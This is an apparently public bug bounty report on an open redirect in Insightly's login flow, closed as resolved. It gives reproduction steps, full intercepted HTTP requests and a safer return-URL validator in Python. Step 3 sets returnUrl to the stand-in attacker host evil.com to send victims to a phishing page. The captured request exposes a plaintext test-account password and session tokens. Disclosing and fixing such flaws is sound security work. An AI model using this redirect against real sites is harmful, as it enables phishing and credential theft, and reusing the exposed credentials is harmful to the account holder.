returnUrl= allows an attacker to redirect users to another phishing website and take over credentials
Severity: Medium
Program: Insightly
Reported by: basant0x01
Vulnerability Details
Hello team,
While testing the application https://crm.na1.insightly.com, I found an interesting parameter through which I was able to redirect users to other domains and take over the victim's account. I found this issue in the login authentication, so there is a chance that I can easily take over the victim's account.
Vulnerable URL: https://crm.na1.insightly.com/User/FrontDoorLogin/?token=fAPkY7H7fgz6AugiWS1HqmgQro69VkrFfjz%2fWKUbuJKtOIbCH0Npi1DvVp0kXUo7JYrQ2Kep6VUOybmgBo6q9byEMy3Itsa35Ra60cK2eUFK6i78lKdX4%2fQN4Ln3UPEzfpMTvk8ocH6Ikix0zKolaN%2f0kaMWB3Ia4GCVOvTPhfZUGkgOY%2fHMC9ZCrdjXMNP%2fjoOqZ%2foqBrFRu4tCE%2fmX%2fJW5o3J18Hx9MOuOVCNgs1mD8zKjIz1uSW%2boBmu%2bMfXT&returnUrl=http%3a%2f%2f192.168.1.77%3a8000%2f
This URL works only once; for every new attack or redirect, a new URL has to be generated.
## Steps to Replicate
[1]. Go to the website [ crm.na1.insightly.com ] and log in with your credentials
[2]. Now intercept the login request; you will see a request like this:
```http
POST /User/AuthenticateForms HTTP/1.1
Host: login.insightly.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
Origin: https://login.insightly.com
Connection: close
Referer: https://login.insightly.com/User/Login?ReturnUrl=%2f
Cookie: _sp_ses.7ea0=*; _sp_id.7ea0=f284c58a-fddc-4d25-be6f-72f320bc4ce3.1650349456.1.1650350244.1650349456.792d3660-5b12-4146-b8d5-114c86c5fded; _ga=GA1.2.502174674.1650349457; _gid=GA1.2.8955303.1650349457; _clck=orzge0|1|f0r|0; _clsk=hdl3b6|1650350248802|3|1|a.clarity.ms/collect; _gcl_au=1.1.368515797.1650349583; optimizelyEndUserId=oeu1650349584844r0.9398955011674065; AWSALB=Y3Fjm3LQsxNKT84McWot52MHU2C/HwfKbq+s74yUTTH2TEx2nF+3XmMjln92tMk76u648lSWWcAxdgiExZPj1hoJjECf7KtNZJETE9f4L/MeRALwV+7n8nE7sp8i; AWSALBCORS=Y3Fjm3LQsxNKT84McWot52MHU2C/HwfKbq+s74yUTTH2TEx2nF+3XmMjln92tMk76u648lSWWcAxdgiExZPj1hoJjECf7KtNZJETE9f4L/MeRALwV+7n8nE7sp8i; __RequestVerificationToken=QCRlZvTgq1rk1IUSbo8mRy-mB7iuijVFW86khR6ZnGbFMug6h6VoK9i31B-I7H-u9D96HtrUMXH6RmwEmgFNbIz50Yg1; X-FrontDoor-ReturnUrl=2edc8651-06eb-403a-96c8-272da3cd9efa; X-FrontDoor-AppId=3a16582b-b1f0-4306-a2ba-397c731514a4; _uetsid=565beaf0bfa911ecb94aef8d37202906; _uetvid=565bd680bfa911ecad8d2b88a420a93c
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
__RequestVerificationToken=4BVQV2MAdvcy2OyK6O0n3y42YRSJDDLcxesTFOeBBnwMLe1tiW_wCpMUoVZOop4wu1SxC95l_rcYoEGGWnzriUmmZJE1&email=ilovebugbounty%40gmail.com&password=AMRIT007qwerty%23&ReturnUrl=%2F&AppId=
```
[3]. Now change the parameter ReturnUrl=%2F to ReturnUrl=https://evil.com
[4]. Send the request
[5]. Now you will receive a GET request like this:
```http
GET /User/FrontDoorLogin/?token=YrkOz7vdHHA9AH7B%2fY5jUdIP1%2bchPdePfn0Zm7uCtVQui0tHHMW24B14WwsYP5%2bKpa3Xz7%2f5r5muQa3EB%2bQEwtPlJ8XbvozoLZFfhD75Sm3tKLhdgfWWHYq8abV2%2bpOtifD1I5N2uomDBXvMQ8tjFREb39XDuUcrObQMUsqboMZY9dojVqORmIYwb4VPyoSBaYOF4%2bYOX3GTYj8t1ArOA0xeH4oorz6flU6FLrfTLdtG6u%2fC7vZ9CfvsfH3F%2bBye&returnUrl=https://evil.com HTTP/1.1
Host: crm.na1.insightly.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://login.insightly.com/
Connection: close
Cookie: _sp_ses.7ea0=*; _sp_id.7ea0=f284c58a-fddc-4d25-be6f-72f320bc4ce3.1650349456.1.1650350244.1650349456.792d3660-5b12-4146-b8d5-114c86c5fded; _ga=GA1.2.502174674.1650349457; _gid=GA1.2.8955303.1650349457; _clck=orzge0|1|f0r|0; _clsk=hdl3b6|1650350248802|3|1|a.clarity.ms/collect; _gcl_au=1.1.368515797.1650349583; optimizelyEndUserId=oeu1650349584844r0.9398955011674065; snaptid=sac1prdc01ap32; __CustomRequestVerificationToken=ba8vT_9GKG9c0C5ouvyDnb6dib23sbOGJDcGfABOsc7nWF0b4EDAJ6rndoYccjq97kyMQUgXaVNze4B9qLr_L6JKVxc1; __CustomRequestVerificationToken_FormFieldToken=yMCVyZ-Lf9cVa5jCl7aMUt0X7F_OIv31VPzzgEenFFItTXoJKRblcOHfQcrZ5J6cGRcyi444j1U6iVu9zMsRh6wYS-2X5UvW3wbEtQTrhgBrMGs1WkyBLkc6JFdwb2yVRXEJ4A2; __CustomRequestVerificationToken_RequestHeader=ba8vT_9GKG9c0C5ouvyDnb6dib23sbOGJDcGfABOsc7nWF0b4EDAJ6rndoYccjq97kyMQUgXaVNze4B9qLr_L6JKVxc1:yMCVyZ-Lf9cVa5jCl7aMUt0X7F_OIv31VPzzgEenFFItTXoJKRblcOHfQcrZ5J6cGRcyi444j1U6iVu9zMsRh6wYS-2X5UvW3wbEtQTrhgBrMGs1WkyBLkc6JFdwb2yVRXEJ4A2; __RequestVerificationToken=wPFGU1uIataG6NwAZqD3eSkHbpqcI_uL95kRCj3JVRzNwWDPjKEzT6Y7gBcVjRxo18lPLGKF0qezBquaDeAuHBPbIfA1; _sp_ses.4737=*; _sp_id.4737=db22efce-2016-4e0a-b209-3fa6d6e03a33.1650349600.1.1650349859.1650349600.9e684406-e88a-47b0-aea8-43f727a538ce; __utma=257427929.502174674.1650349457.1650349601.1650349601.1; __utmb=257427929.4.10.1650349601; __utmc=257427929; __utmz=257427929.1650349601.1.1.utmcsr=accounts.insightly.com|utmccn=(referral)|utmcmd=referral|utmcct=/; _ga=GA1.4.502174674.1650349457; _gid=GA1.4.8955303.1650349457; error=; _uetsid=565beaf0bfa911ecb94aef8d37202906; _uetvid=565bd680bfa911ecad8d2b88a420a93c
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-site
Sec-Fetch-User: ?1
```
{F1698318}
[6]. Now copy that URL and domain. For the attack, the final URL will look like this:
```
https://crm.na1.insightly.com/User/FrontDoorLogin/?token=fAPkY7H7fgz6AugiWS1HqmgQro69VkrFfjz/WKUbuJKtOIbCH0Npi1DvVp0kXUo7JYrQ2Kep6VUOybmgBo6q9byEMy3Itsa35Ra60cK2eUFK6i78lKdX4/QN4Ln3UPEzfpMTvk8ocH6Ikix0zKolaN/0kaMWB3Ia4GCVOvTPhfZUGkgOY/HMC9ZCrdjXMNP/joOqZ/oqBrFRu4tCE/mX/JW5o3J18Hx9MOuOVCNgs1mD8zKjIz1uSW+oBmu+MfXT&returnUrl=https://evil.com
```
{F1698323}
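A server-side check that closes this class of issue, added here as an example and not taken from Insightly's code: the decoded ReturnUrl/returnUrl value is honoured only when it is a site-relative path or an https URL on an explicitly allowed host, and everything else (the `https://evil.com` and `http://192.168.1.77:8000/` values from this report included) falls back to `/`. The allowed-host list and the function name are assumptions.

```python
from urllib.parse import urlsplit, urlunsplit

# Hosts the login flow may return users to (constructed example list; the two
# Insightly hostnames are taken from the requests in this report).
ALLOWED_HOSTS = {"crm.na1.insightly.com", "login.insightly.com"}
DEFAULT_RETURN = "/"


def safe_return_url(candidate: str, allowed_hosts: set = ALLOWED_HOSTS) -> str:
    """Return a redirect target that stays on an allowed host.

    Expects the already URL-decoded parameter value. Anything that is not a
    plain site-relative path or an https URL on an allowed host collapses to
    DEFAULT_RETURN, so an attacker-controlled returnUrl cannot send the user
    off-site.
    """
    if not candidate:
        return DEFAULT_RETURN
    candidate = candidate.strip()
    # Browsers treat backslashes as slashes, so "/\evil.com" navigates to
    # "//evil.com"; normalise before parsing so the check sees what the browser sees.
    normalised = candidate.replace("\\", "/")
    parts = urlsplit(normalised)

    if parts.scheme == "" and parts.netloc == "":
        # Site-relative path: exactly one leading "/" is required. A "//host"
        # prefix is protocol-relative and never reaches this branch because
        # urlsplit reports it with a non-empty netloc.
        if normalised.startswith("/") and not normalised.startswith("//"):
            return normalised
        return DEFAULT_RETURN

    # Absolute URL: only https and an exact hostname match are accepted, which
    # rejects "https://crm.na1.insightly.com.evil.com" (different host) and
    # "https://crm.na1.insightly.com@evil.com" (hostname is evil.com).
    if parts.scheme != "https" or parts.hostname not in allowed_hosts:
        return DEFAULT_RETURN
    try:
        # Embedded credentials and explicit ports are rejected outright; a
        # malformed port ("host:abc") makes .port raise ValueError.
        if parts.username is not None or parts.port is not None:
            return DEFAULT_RETURN
    except ValueError:
        return DEFAULT_RETURN
    # Rebuild the URL from the validated pieces; drop any fragment.
    return urlunsplit(("https", parts.hostname, parts.path or "/", parts.query, ""))
```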
## Impact
An attacker can easily redirect users to another phishing site and take over the victim's account using the login endpoint.
Report Details
State: Closed
Substate: Resolved
Weakness: Improper Authentication - Generic